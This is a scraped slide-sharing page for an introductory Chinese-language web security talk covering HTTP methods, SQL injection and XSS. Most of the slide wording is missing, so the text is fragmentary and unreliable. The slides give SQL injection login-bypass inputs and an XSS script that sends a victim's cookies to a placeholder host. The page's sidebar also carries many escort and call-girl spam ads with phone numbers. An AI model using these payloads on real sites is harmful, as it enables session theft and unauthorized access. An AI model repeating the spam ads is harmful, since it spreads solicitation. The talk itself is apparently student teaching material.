Enviar búsqueda
Cargar
Web sec-淺談
•
1 recomendación
•
393 vistas
Jyny Chen
Seguir
中興資訊科學研習社x逢甲黑客社 交流
Leer menos
Leer más
Internet
Denunciar
Compartir
Denunciar
Compartir
1 de 57
Descargar ahora
Descargar para leer sin conexión
Recomendados
Ce e nou in Rails 4
Ce e nou in Rails 4
Florin Oltean
Djangocon
Djangocon
Jeff Balogh
Pse2010 rel storage
Pse2010 rel storage
Lars Noldan
YSlow 2.0
YSlow 2.0
Stoyan Stefanov
Progressive Downloads and Rendering
Progressive Downloads and Rendering
Stoyan Stefanov
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
Selenium再入門
Selenium再入門
Norio Suzuki
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
Joseph Scott
Recomendados
Ce e nou in Rails 4
Ce e nou in Rails 4
Florin Oltean
Djangocon
Djangocon
Jeff Balogh
Pse2010 rel storage
Pse2010 rel storage
Lars Noldan
YSlow 2.0
YSlow 2.0
Stoyan Stefanov
Progressive Downloads and Rendering
Progressive Downloads and Rendering
Stoyan Stefanov
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
Selenium再入門
Selenium再入門
Norio Suzuki
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
Joseph Scott
Coldfusion comparison
Coldfusion comparison
isotools_2012
Session3 part1
Session3 part1
banputer
Liking performance
Liking performance
Stoyan Stefanov
Progressive Downloads and Rendering - take #2
Progressive Downloads and Rendering - take #2
Stoyan Stefanov
JavaScript performance patterns
JavaScript performance patterns
Stoyan Stefanov
High Performance Social Plugins
High Performance Social Plugins
Stoyan Stefanov
JavaScript Performance Patterns
JavaScript Performance Patterns
Stoyan Stefanov
Introduction to Chef
Introduction to Chef
Suresh Paulraj
下吧开发总结
下吧开发总结
Night Sailer
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson
Mozilla Web QA - Evolution of our Python WebDriver framework
Mozilla Web QA - Evolution of our Python WebDriver framework
davehunt82
Jozef Ve Providing Scalability for Pirates, Lizards and Zombies at #DOXLON
Jozef Ve Providing Scalability for Pirates, Lizards and Zombies at #DOXLON
Outlyer
Web security for app developers
Web security for app developers
Pablo Gazmuri
Webapp security testing
Webapp security testing
Tomas Doran
HTML5 History & Features
HTML5 History & Features
Dave Ross
資安入門
資安入門
Jyny Chen
資訊安全入門
資訊安全入門
Tyler Chen
資策會 新生茶會
資策會 新生茶會
Jyny Chen
Apt攻擊簡介 tyler
Apt攻擊簡介 tyler
Tyler Chen
Network
Network
Jyny Chen
Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析
Bill Lin
網站自動化測試
網站自動化測試
Bruce Chen
Más contenido relacionado
La actualidad más candente
Coldfusion comparison
Coldfusion comparison
isotools_2012
Session3 part1
Session3 part1
banputer
Liking performance
Liking performance
Stoyan Stefanov
Progressive Downloads and Rendering - take #2
Progressive Downloads and Rendering - take #2
Stoyan Stefanov
JavaScript performance patterns
JavaScript performance patterns
Stoyan Stefanov
High Performance Social Plugins
High Performance Social Plugins
Stoyan Stefanov
JavaScript Performance Patterns
JavaScript Performance Patterns
Stoyan Stefanov
Introduction to Chef
Introduction to Chef
Suresh Paulraj
下吧开发总结
下吧开发总结
Night Sailer
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson
Mozilla Web QA - Evolution of our Python WebDriver framework
Mozilla Web QA - Evolution of our Python WebDriver framework
davehunt82
Jozef Ve Providing Scalability for Pirates, Lizards and Zombies at #DOXLON
Jozef Ve Providing Scalability for Pirates, Lizards and Zombies at #DOXLON
Outlyer
Web security for app developers
Web security for app developers
Pablo Gazmuri
Webapp security testing
Webapp security testing
Tomas Doran
HTML5 History & Features
HTML5 History & Features
Dave Ross
La actualidad más candente
(15)
Coldfusion comparison
Coldfusion comparison
Session3 part1
Session3 part1
Liking performance
Liking performance
Progressive Downloads and Rendering - take #2
Progressive Downloads and Rendering - take #2
JavaScript performance patterns
JavaScript performance patterns
High Performance Social Plugins
High Performance Social Plugins
JavaScript Performance Patterns
JavaScript Performance Patterns
Introduction to Chef
Introduction to Chef
下吧开发总结
下吧开发总结
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mozilla Web QA - Evolution of our Python WebDriver framework
Mozilla Web QA - Evolution of our Python WebDriver framework
Jozef Ve Providing Scalability for Pirates, Lizards and Zombies at #DOXLON
Jozef Ve Providing Scalability for Pirates, Lizards and Zombies at #DOXLON
Web security for app developers
Web security for app developers
Webapp security testing
Webapp security testing
HTML5 History & Features
HTML5 History & Features
Destacado
資安入門
資安入門
Jyny Chen
資訊安全入門
資訊安全入門
Tyler Chen
資策會 新生茶會
資策會 新生茶會
Jyny Chen
Apt攻擊簡介 tyler
Apt攻擊簡介 tyler
Tyler Chen
Network
Network
Jyny Chen
Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析
Bill Lin
網站自動化測試
網站自動化測試
Bruce Chen
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
Weber Tsai
網站程式資安白箱與黑箱檢測處理經驗分享
網站程式資安白箱與黑箱檢測處理經驗分享
Ying-Chun Cheng
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Sheng-Hao Ma
台科逆向簡報
台科逆向簡報
耀德 蔡
git, repo, Gerrit 基礎教學
git, repo, Gerrit 基礎教學
Doremi Lin
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Sheng-Hao Ma
逆向工程入門
逆向工程入門
耀德 蔡
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
dpd
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area
Orange Tsai
Cross site scripting XSS
Cross site scripting XSS
Ronan Dunne, CEH, SSCP
ROP 輕鬆談
ROP 輕鬆談
hackstuff
防毒擋不住?勒索病毒猖獗與實作
防毒擋不住?勒索病毒猖獗與實作
Sheng-Hao Ma
Destacado
(20)
資安入門
資安入門
資訊安全入門
資訊安全入門
資策會 新生茶會
資策會 新生茶會
Apt攻擊簡介 tyler
Apt攻擊簡介 tyler
Network
Network
Static Code Analysis 靜態程式碼分析
Static Code Analysis 靜態程式碼分析
網站自動化測試
網站自動化測試
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
網站程式資安白箱與黑箱檢測處理經驗分享
網站程式資安白箱與黑箱檢測處理經驗分享
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
台科逆向簡報
台科逆向簡報
git, repo, Gerrit 基礎教學
git, repo, Gerrit 基礎教學
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
逆向工程入門
逆向工程入門
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area
Cross site scripting XSS
Cross site scripting XSS
ROP 輕鬆談
ROP 輕鬆談
防毒擋不住?勒索病毒猖獗與實作
防毒擋不住?勒索病毒猖獗與實作
Similar a Web sec-淺談
F2e security
F2e security
jay li
Hacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
Web security and OWASP
Web security and OWASP
Isuru Samaraweera
Web application Security
Web application Security
Lee C
スマートフォンサイトの作成術 - 大川洋一
スマートフォンサイトの作成術 - 大川洋一
okyawa
Austin Day of Rest - Introduction
Austin Day of Rest - Introduction
HandsOnWP.com
Web前端性能优化 2014
Web前端性能优化 2014
Yubei Li
Webmonkey
Webmonkey
isac Lagerblad
20190827_#35_we_are_javascripters
20190827_#35_we_are_javascripters
将一 深見
OmniAuth: From the Ground Up
OmniAuth: From the Ground Up
Michael Bleigh
Webservices: The RESTful Approach
Webservices: The RESTful Approach
Mushfekur Rahman
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP Assignment
Lesa Cote
Boss hack u-iit-madras-2012
Boss hack u-iit-madras-2012
discoversudhir
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injection
Vi Tính Hoàng Nam
HTML+JQuery by Rio
HTML+JQuery by Rio
Agate Studio
11.05.21 Google I/O報告会 in 東京 なかざわ資料
11.05.21 Google I/O報告会 in 東京 なかざわ資料
Kei Nakazawa
Plone api
Plone api
Nejc Zupan
js型変換
js型変換
Ryuuichi Iha
ETI SEO.pptx
ETI SEO.pptx
ChalseaDagar
ETI SEO.pptx
ETI SEO.pptx
chalseadagar1
Similar a Web sec-淺談
(20)
F2e security
F2e security
Hacking sites for fun and profit
Hacking sites for fun and profit
Web security and OWASP
Web security and OWASP
Web application Security
Web application Security
スマートフォンサイトの作成術 - 大川洋一
スマートフォンサイトの作成術 - 大川洋一
Austin Day of Rest - Introduction
Austin Day of Rest - Introduction
Web前端性能优化 2014
Web前端性能优化 2014
Webmonkey
Webmonkey
20190827_#35_we_are_javascripters
20190827_#35_we_are_javascripters
OmniAuth: From the Ground Up
OmniAuth: From the Ground Up
Webservices: The RESTful Approach
Webservices: The RESTful Approach
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP Assignment
Boss hack u-iit-madras-2012
Boss hack u-iit-madras-2012
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injection
HTML+JQuery by Rio
HTML+JQuery by Rio
11.05.21 Google I/O報告会 in 東京 なかざわ資料
11.05.21 Google I/O報告会 in 東京 なかざわ資料
Plone api
Plone api
js型変換
js型変換
ETI SEO.pptx
ETI SEO.pptx
ETI SEO.pptx
ETI SEO.pptx
Último
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
soniya singh
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Call Girls in Nagpur High Profile
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
soniya singh
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
soniya singh
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
APNIC
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
Call Girls in Nagpur High Profile Call Girls
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
James Anderson
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
SofiyaSharma5
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)
Damian Radcliffe
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
APNIC
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
ellan12
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
Diya Sharma
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
Neha Pandey
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Seo
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Damian Radcliffe
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Delhi Call girls
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
Último
(20)
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
Low Rate Young Call Girls in Sector 63 Mamura Noida ✔️☆9289244007✔️☆ Female E...
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
Web sec-淺談
1.
Web Sec Intro jyny
@ NCHUIT
2.
( )
3.
Web Sec ( XD)
4.
:) hello world :)
5.
About • jyny • • • • • • • TDOH •
jyny.tw • about.me/jyny
6.
• HTTP Method •
SQL Injection • XSS •
7.
8.
HTTP Method ( )
9.
HTTP Method • GET •
POST • etc.
10.
HTTP Method • GET •
HTTP Request • Enter
11.
HTTP Method • POST • •
" "," "
12.
m(_ _)m
13.
what??
14.
?=
15.
GET POST • key
value • url.com?key=value • & • % Url encode
16.
HTTP Method • • or •
g0t.pw/http.php
17.
18.
SQL Injection
19.
SQL Injection • SQL •
SQL • OWASP Top 10 •
20.
SQL Injection • GET
POST DB • server • Server SQL
21.
....
22.
SQL Injection • PHP
query
23.
SQL Injection • • username
= jyny • password = pwd
24.
SQL Injection • SQL
query
25.
Orz
26.
But
27.
SQL Injection • • username
= 1' OR uid='1'/* • password = */ OR password='
28.
29.
SQL Injection • SQL
query
30.
SQL Injection • SQL
query • query
31.
....
32.
SQL Injection
33.
SQL Injection • • user=%27%20or%20%27%27%20%3D %20%27%27%20--&pass=aaaaaaa •
URL encoding • %27 %20 %3d
34.
SQL Injection •
35.
SQL Injection • •
36.
XD
37.
SQL Injection • •
38.
SQL Injection • SQL • •
39.
SQL Injection • SQL
Injection • sqlmap
40.
41.
XSS
42.
XSS • Cross-site scripting • •
OWASP Top 10
43.
XSS • <script>...</script> • • WOW!
44.
XSS • Server • •
45.
XSS • • XD
46.
XSS • • g0t.pw/xhttp.php?%3Cscript%3Ealert(1)%3B%3C %2Fscript%3E • Orz •
47.
XSS • • • <script> document.write('<img src="http://url?cookie='
+ document.cookie + '&location=' + document.location + '" />'); </script>
48.
XSS • ? • request •
cookie • Cookie
49.
Cookie
50.
XSS • Cookie • Session •
51.
52.
upload • • %00 • •
53.
• code injection •
comment injection • •
54.
Orz
55.
• • •
56.
Reference • http://www.slideshare.net/chivincent/sql-injection- in-ttu • https://gist.github.com/Inndy/ 654aaf98cb260b75b8f3 •
https://github.com/Jyny/pasc2at • https://securityreactions.tumblr.com/
57.
THX
Descargar ahora